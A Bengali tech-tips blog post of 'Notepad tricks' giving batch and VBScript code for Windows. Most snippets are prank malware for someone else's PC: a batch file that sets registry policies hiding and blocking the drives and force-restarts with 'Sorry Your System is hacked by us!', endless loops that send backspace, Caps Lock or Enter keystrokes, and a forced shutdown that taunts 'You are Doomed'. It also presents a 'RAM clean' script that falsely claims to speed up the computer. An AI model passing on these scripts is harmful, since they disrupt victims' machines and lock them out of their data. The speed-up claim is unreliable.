বিডি টিপ্স টেকে আপনাদের সবাইকে স্বাগতম।কিছু নোটপ্যাড ট্রিক্স এর প্রথম পর্ব যারা মিস করেছেন তারা এখান থেকে আসতে পারেন কিছু notepad ট্রিকস(part-1)
Hard disk Disable করুন:
প্রথমে Notepad Open করে নিচের কোডটি লিখুন:
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n
shutdown -r -c \”Sorry Your System is hacked by us!\” -f
এবার একে Disable hard disk.bat নামে সেভ করুন।এই ফাইলটি রান করালে আপনার Computer এর Hard disk disable হয়ে যাবে।
RAM Clean করে আপনার কম্পিউটারের স্পিড বাড়ান:
নিচের Command টি লিখতে হবে:
FreeMem=Space(64000000)
এবার একে যেকোন ফাইল নেম দিয়ে bdtipstech.vbs ফাইল হিসেবে সেভ করুন।এবার ফাইলটিকে রান করালে কিছুটা RAM Clean হবে এবং আপনার Computer টি দ্রুত কাজ করবে।
এছাড়াও আপনি যদি আরও মেমরি ক্লিন করতে চান তবে নিচের Command গুলো দেখুন:
FreeMem= (256000000) for 256 mb
FreeMem= (128000000) for 128 mb
FreeMem= (72000000) for 72 mb
FreeMem= (64000000) for 64 mb
FreeMem= (32000000) for 32 mb
FreeMem= (24000000) for 24 mb
লক্ষ্য রাখবেন আপনার Command কৃত মেমরি RAM এর মেমরি থেকে বেশি না হয়। My
Computer Properties এ আপনার কাঙ্খিত ছবি:
প্রথমে নোটপ্যাড Open করুন এবং নিম্নের কোডটি Paste করুন।
[General]
Manufacturer=Your Name Here
[Support Information]
Line1=Your Name Here
Line2=Your Address Here
Line3=Your Email Address Here
এখন File > Save As… এ গিয়ে File name: OEMINFO.INI লিখে Save করুন এবং আপনার পছন্দের ছবি যেটিকে আপনি ব্যহার করতে চান, সেটিকে Oemlogo নাম দিয়ে .bmp তে Save করুন। মনে রাখবেন আপনার পছন্দের ছবিটি যেন .bmp ফরমেটে থাকে।
এবার OEMINFO.INI এবং Oemlogo.bmp দুইটি ফাইল C:\WINDOWS\system32 তে পেষ্ট করে দিন। এখন My Computer Properties এ ক্লিক করলেই আপনার কাঙ্খিত ছবিটি দেখতে পারবেন।
কীবোর্ড কী AUTO কাজ করবে:
MsgBox “stop me..! if you can”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
কোড গোলো COPY করেন নোটপ্যাড এ Save করেন pc.vbs নামে।
এটিও পড়ুন nokia mobile এর কিছু প্রয়োজনীয় কোড
কম্পিউটার shut down হইয়া যাবে:
@echo off
msg * I don’t like you
shutdown -c “Hahahah You are Doomed” -s
কোড গোলো COPY করেন নোটপ্যাড এ Save করেন pc.bat নামে।
Caps Lock button কাজ করবে AUTO:
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
কোড গোলো COPY করেন নোটপ্যাড এ Save করেন pc.vbs নামে।
Enter কাজ করবে AUTO:
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
কোড গোলো COPY করেন নোটপ্যাড এ Save করেন pc.vbs নামে।
এটিও পড়ুন Download করে নিন Facebook emotion code collection
উপরের কিছু কিছু ট্রিকস উইন্ডোজ সেভেনে কাজ নাও করতে পারে ।তবে চেষ্টা করে দেখতে পারেন। মোবাইল ও পিসির যেকোনো সমস্যার সমাধান এবং সিমের অফার জানতে প্রতিদিন ভিজিট করুন bd tips tech ফেইসবুকের মাধ্যমে আপডেট পেতে লাইক দিন বিডি টিপ্স টেক
No comments:
আমাদের পোস্টগুলি ভালো লাগলে কমেন্ট করে আমাদের উৎসাহ দিন